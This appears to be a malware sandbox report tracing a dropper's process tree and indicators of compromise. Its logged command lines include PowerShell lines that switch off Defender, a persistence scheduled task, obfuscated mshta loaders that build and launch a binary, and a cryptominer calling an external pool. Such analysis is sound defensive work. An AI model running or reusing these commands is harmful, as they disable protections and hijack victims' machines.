Token: SeAssignPrimaryTokenPrivilege	856	Sun03d477f1a31.exe
Token: SeLockMemoryPrivilege	856	Sun03d477f1a31.exe
Token: SeIncreaseQuotaPrivilege	856	Sun03d477f1a31.exe
Token: SeMachineAccountPrivilege	856	Sun03d477f1a31.exe
Token: SeTcbPrivilege	856	Sun03d477f1a31.exe
Token: SeSecurityPrivilege	856	Sun03d477f1a31.exe
Token: SeTakeOwnershipPrivilege	856	Sun03d477f1a31.exe
Token: SeLoadDriverPrivilege	856	Sun03d477f1a31.exe
Token: SeSystemProfilePrivilege	856	Sun03d477f1a31.exe
Token: SeSystemtimePrivilege	856	Sun03d477f1a31.exe
Token: SeProfSingleProcessPrivilege	856	Sun03d477f1a31.exe
Token: SeIncBasePriorityPrivilege	856	Sun03d477f1a31.exe
Token: SeCreatePagefilePrivilege	856	Sun03d477f1a31.exe
Token: SeCreatePermanentPrivilege	856	Sun03d477f1a31.exe
Token: SeBackupPrivilege	856	Sun03d477f1a31.exe
Token: SeRestorePrivilege	856	Sun03d477f1a31.exe
Token: SeShutdownPrivilege	856	Sun03d477f1a31.exe
Token: SeDebugPrivilege	856	Sun03d477f1a31.exe
Token: SeAuditPrivilege	856	Sun03d477f1a31.exe
Token: SeSystemEnvironmentPrivilege	856	Sun03d477f1a31.exe
Token: SeChangeNotifyPrivilege	856	Sun03d477f1a31.exe
Token: SeRemoteShutdownPrivilege	856	Sun03d477f1a31.exe
Token: SeUndockPrivilege	856	Sun03d477f1a31.exe
Token: SeSyncAgentPrivilege	856	Sun03d477f1a31.exe
Token: SeEnableDelegationPrivilege	856	Sun03d477f1a31.exe
Token: SeManageVolumePrivilege	856	Sun03d477f1a31.exe
Token: SeImpersonatePrivilege	856	Sun03d477f1a31.exe
Token: SeCreateGlobalPrivilege	856	Sun03d477f1a31.exe
Token: 31	856	Sun03d477f1a31.exe
Token: 32	856	Sun03d477f1a31.exe
Token: 33	856	Sun03d477f1a31.exe
Token: 34	856	Sun03d477f1a31.exe
Token: 35	856	Sun03d477f1a31.exe
Token: SeDebugPrivilege	1584	Sun03ea09aa5c9686e5.exe
Token: SeDebugPrivilege	268	Sun0328255c4bce6fb.exe
Token: SeDebugPrivilege	2624	taskkill.exe
Token: SeDebugPrivilege	2660	taskkill.exe
Token: SeDebugPrivilege	552	WerFault.exe
Token: SeDebugPrivilege	2856	WerFault.exe
Token: SeShutdownPrivilege	1284
Token: SeShutdownPrivilege	1284
Token: SeDebugPrivilege	2256	WerFault.exe
Token: SeDebugPrivilege	692	DownFlSetup110.exe
Token: SeDebugPrivilege	2632	4.exe
Token: SeShutdownPrivilege	1284
Token: SeDebugPrivilege	2664	5.exe
Token: SeDebugPrivilege	2144	Sun03f0dc4460bc9.exe
Token: SeShutdownPrivilege	1284
Token: SeShutdownPrivilege	1284
Token: SeDebugPrivilege	2904	6.exe
Token: SeShutdownPrivilege	1284
Token: SeDebugPrivilege	2480	WerFault.exe
Token: SeShutdownPrivilege	1284
Token: SeShutdownPrivilege	1284
Token: SeShutdownPrivilege	1284
Token: SeShutdownPrivilege	1284
Token: SeDebugPrivilege	2132	3793266.exe
Token: SeDebugPrivilege	932	taskkill.exe
Token: SeDebugPrivilege	1836	taskkill.exe
Token: SeDebugPrivilege	1548	taskkill.exe
Token: SeDebugPrivilege	2720	4691549.exe

Suspicious use of FindShellTrayWindow 19 IoCs

Processes:

Sun03f5d51697d04.tmp

pid process

1248 Sun03f5d51697d04.tmp
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
Suspicious use of SendNotifyMessage 6 IoCs

Processes:

pid process

1284
1284
1284
1284
1284
1284

pid	process
1248	Sun03f5d51697d04.tmp
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284
1284

pid	process
1284
1284
1284
1284
1284
1284

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.exe

description	pid	process	target process
PID 1692 wrote to memory of 2028	1692	setup_x86_x64_install.exe	setup_installer.exe
PID 1692 wrote to memory of 2028	1692	setup_x86_x64_install.exe	setup_installer.exe
PID 1692 wrote to memory of 2028	1692	setup_x86_x64_install.exe	setup_installer.exe
PID 1692 wrote to memory of 2028	1692	setup_x86_x64_install.exe	setup_installer.exe
PID 1692 wrote to memory of 2028	1692	setup_x86_x64_install.exe	setup_installer.exe
PID 1692 wrote to memory of 2028	1692	setup_x86_x64_install.exe	setup_installer.exe
PID 1692 wrote to memory of 2028	1692	setup_x86_x64_install.exe	setup_installer.exe
PID 2028 wrote to memory of 680	2028	setup_installer.exe	setup_install.exe
PID 2028 wrote to memory of 680	2028	setup_installer.exe	setup_install.exe
PID 2028 wrote to memory of 680	2028	setup_installer.exe	setup_install.exe
PID 2028 wrote to memory of 680	2028	setup_installer.exe	setup_install.exe
PID 2028 wrote to memory of 680	2028	setup_installer.exe	setup_install.exe
PID 2028 wrote to memory of 680	2028	setup_installer.exe	setup_install.exe
PID 2028 wrote to memory of 680	2028	setup_installer.exe	setup_install.exe
PID 680 wrote to memory of 1556	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1556	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1556	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1556	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1556	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1556	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1556	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1560	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1560	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1560	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1560	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1560	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1560	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1560	680	setup_install.exe	cmd.exe
PID 1560 wrote to memory of 1300	1560	cmd.exe	powershell.exe
PID 1560 wrote to memory of 1300	1560	cmd.exe	powershell.exe
PID 1560 wrote to memory of 1300	1560	cmd.exe	powershell.exe
PID 1560 wrote to memory of 1300	1560	cmd.exe	powershell.exe
PID 1560 wrote to memory of 1300	1560	cmd.exe	powershell.exe
PID 1560 wrote to memory of 1300	1560	cmd.exe	powershell.exe
PID 1560 wrote to memory of 1300	1560	cmd.exe	powershell.exe
PID 1556 wrote to memory of 1072	1556	cmd.exe	powershell.exe
PID 1556 wrote to memory of 1072	1556	cmd.exe	powershell.exe
PID 1556 wrote to memory of 1072	1556	cmd.exe	powershell.exe
PID 1556 wrote to memory of 1072	1556	cmd.exe	powershell.exe
PID 1556 wrote to memory of 1072	1556	cmd.exe	powershell.exe
PID 1556 wrote to memory of 1072	1556	cmd.exe	powershell.exe
PID 1556 wrote to memory of 1072	1556	cmd.exe	powershell.exe
PID 680 wrote to memory of 1852	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1852	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1852	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1852	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1852	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1852	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1852	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1832	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1832	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1832	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1832	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1832	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1832	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1832	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1828	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1828	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1828	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1828	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1828	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1828	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 1828	680	setup_install.exe	cmd.exe
PID 680 wrote to memory of 112	680	setup_install.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1692

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2028

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
4⤵
- Suspicious use of WriteProcessMemory
PID:1556

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe
4⤵
- Loads dropped DLL
PID:1852

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03d477f1a31.exe
Sun03d477f1a31.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:856

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:2568

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone
4⤵
- Loads dropped DLL
PID:1832

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun033e271e0ce96c08.exe
Sun033e271e0ce96c08.exe /mixone
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1096

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun033e271e0ce96c08.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun033e271e0ce96c08.exe" & exit
6⤵
PID:2592

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Sun033e271e0ce96c08.exe" /f
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun039750b00c.exe
4⤵
PID:1828

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun039750b00c.exe
Sun039750b00c.exe
5⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:3300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe
4⤵
- Loads dropped DLL
PID:112

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f0dc4460bc9.exe
Sun03f0dc4460bc9.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1184

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f0dc4460bc9.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f0dc4460bc9.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2144

C:\Users\Admin\AppData\Local\Temp\mk.exe
"C:\Users\Admin\AppData\Local\Temp\mk.exe"
7⤵
- Executes dropped EXE
PID:2428

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2428 -s 1172
8⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe
4⤵
- Loads dropped DLL
PID:712

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03e4aeb7e43a1c.exe
Sun03e4aeb7e43a1c.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 800
6⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2256

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe
4⤵
- Loads dropped DLL
PID:1920

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0397381f1f458e.exe
Sun0397381f1f458e.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1088

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0397381f1f458e.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0397381f1f458e.exe" -u
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe
4⤵
- Loads dropped DLL
PID:1800

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun038aa349e3318e.exe
Sun038aa349e3318e.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1728

C:\Users\Admin\Pictures\Adobe Films\EG2euHbbW01B89lCgVNdYQHC.exe
"C:\Users\Admin\Pictures\Adobe Films\EG2euHbbW01B89lCgVNdYQHC.exe"
6⤵
- Executes dropped EXE
PID:2784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 1516
6⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe
4⤵
- Loads dropped DLL
PID:1736

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03ea09aa5c9686e5.exe
Sun03ea09aa5c9686e5.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
- Executes dropped EXE
PID:2368

C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
7⤵
- Executes dropped EXE
- Modifies system certificate store
PID:268

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
8⤵
PID:3152

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:3936

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
10⤵
- Creates scheduled task(s)
PID:3980

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:2608

C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
10⤵
- Executes dropped EXE
PID:3312

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
11⤵
- Suspicious use of SetThreadContext
PID:3484

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
12⤵
- Executes dropped EXE
PID:3424

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
13⤵
PID:3916

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
12⤵
PID:3492

C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:692

C:\Users\Admin\AppData\Roaming\3793266.exe
"C:\Users\Admin\AppData\Roaming\3793266.exe"
8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2132

C:\Users\Admin\AppData\Roaming\4691549.exe
"C:\Users\Admin\AppData\Roaming\4691549.exe"
8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2720

C:\Users\Admin\AppData\Roaming\8709834.exe
"C:\Users\Admin\AppData\Roaming\8709834.exe"
8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2220

C:\Users\Admin\AppData\Roaming\5717225.exe
"C:\Users\Admin\AppData\Roaming\5717225.exe"
8⤵
- Executes dropped EXE
PID:2952

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT( "WSCRiPT.SHelL" ). RuN("C:\Windows\system32\cmd.exe /R copY /Y ""C:\Users\Admin\AppData\Roaming\5717225.exe"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If """" == """" for %T IN (""C:\Users\Admin\AppData\Roaming\5717225.exe"" ) do taskkill -iM ""%~nxT"" -f" , 0,trUe ) )
9⤵
PID:1900

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R copY /Y "C:\Users\Admin\AppData\Roaming\5717225.exe" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq &If "" =="" for %T IN ("C:\Users\Admin\AppData\Roaming\5717225.exe") do taskkill -iM "%~nxT" -f
10⤵
PID:2168

C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE
..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq
11⤵
- Executes dropped EXE
PID:1720

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT( "WSCRiPT.SHelL" ). RuN("C:\Windows\system32\cmd.exe /R copY /Y ""C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If ""/PrWIGG7qbcjwuF1awT~BmZfq "" == """" for %T IN (""C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE"" ) do taskkill -iM ""%~nxT"" -f" , 0,trUe ) )
12⤵
PID:3320

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R copY /Y "C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq &If "/PrWIGG7qbcjwuF1awT~BmZfq " =="" for %T IN ("C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE") do taskkill -iM "%~nxT" -f
13⤵
PID:3524

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCRIPt: cLoSE ( cReatEOBJECT( "wscRIPt.shell" ). rUn ("CMd /c ecHO | SeT /P = ""MZ"" >STBAQR.mZ &CoPy /b /y StbAQR.mZ +NNIZo8.S+ _7Ijs.BLD + GX3VA2JI.W+ JGSZHKM.HL + XD16P.N ..\WaVZQ~GT.C & StArT regsvr32 /s ..\WAvZq~GT.C /u &del /Q *" ,0 ,tRUE))
12⤵
- Modifies Internet Explorer settings
PID:3632

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ecHO | SeT /P = "MZ" >STBAQR.mZ &CoPy /b /y StbAQR.mZ +NNIZo8.S+ _7Ijs.BLD + GX3VA2JI.W+ JGSZHKM.HL +XD16P.N ..\WaVZQ~GT.C & StArT regsvr32 /s ..\WAvZq~GT.C /u &del /Q *
13⤵
PID:3688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>STBAQR.mZ"
14⤵
PID:3728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ecHO "
14⤵
PID:3720

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s ..\WAvZq~GT.C /u
14⤵
PID:3748

C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "5717225.exe" -f
11⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Users\Admin\AppData\Roaming\6391113.exe
"C:\Users\Admin\AppData\Roaming\6391113.exe"
8⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2648

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
9⤵
- Executes dropped EXE
PID:2068

C:\Users\Admin\AppData\Roaming\3606297.exe
"C:\Users\Admin\AppData\Roaming\3606297.exe"
8⤵
- Executes dropped EXE
PID:2600

C:\Users\Admin\AppData\Local\Temp\inst1.exe
"C:\Users\Admin\AppData\Local\Temp\inst1.exe"
7⤵
- Executes dropped EXE
PID:1816

C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
7⤵
- Executes dropped EXE
PID:1076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 1368
8⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:2384

C:\Users\Admin\AppData\Local\Temp\4.exe
"C:\Users\Admin\AppData\Local\Temp\4.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2632

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2632 -s 1408
8⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2480

C:\Users\Admin\AppData\Local\Temp\5.exe
"C:\Users\Admin\AppData\Local\Temp\5.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2664

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
7⤵
- Executes dropped EXE
PID:1636

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
8⤵
PID:516

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
9⤵
PID:1876

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "search_hyperfs_206.exe"
10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1836

C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
10⤵
- Executes dropped EXE
PID:2376

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
11⤵
PID:3336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
12⤵
PID:3532

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
11⤵
PID:3820

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
12⤵
PID:3872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
13⤵
PID:3928

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHo "
13⤵
PID:3920

C:\Windows\SysWOW64\msiexec.exe
msiexec -Y ..\lXQ2g.WC
13⤵
PID:3780

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
7⤵
- Executes dropped EXE
PID:2216

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
8⤵
PID:1100

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "setup.exe" /f
9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:932

C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe
"C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"
7⤵
- Executes dropped EXE
PID:2228

C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
7⤵
- Executes dropped EXE
PID:2084

C:\Users\Admin\AppData\Local\Temp\6.exe
"C:\Users\Admin\AppData\Local\Temp\6.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2904

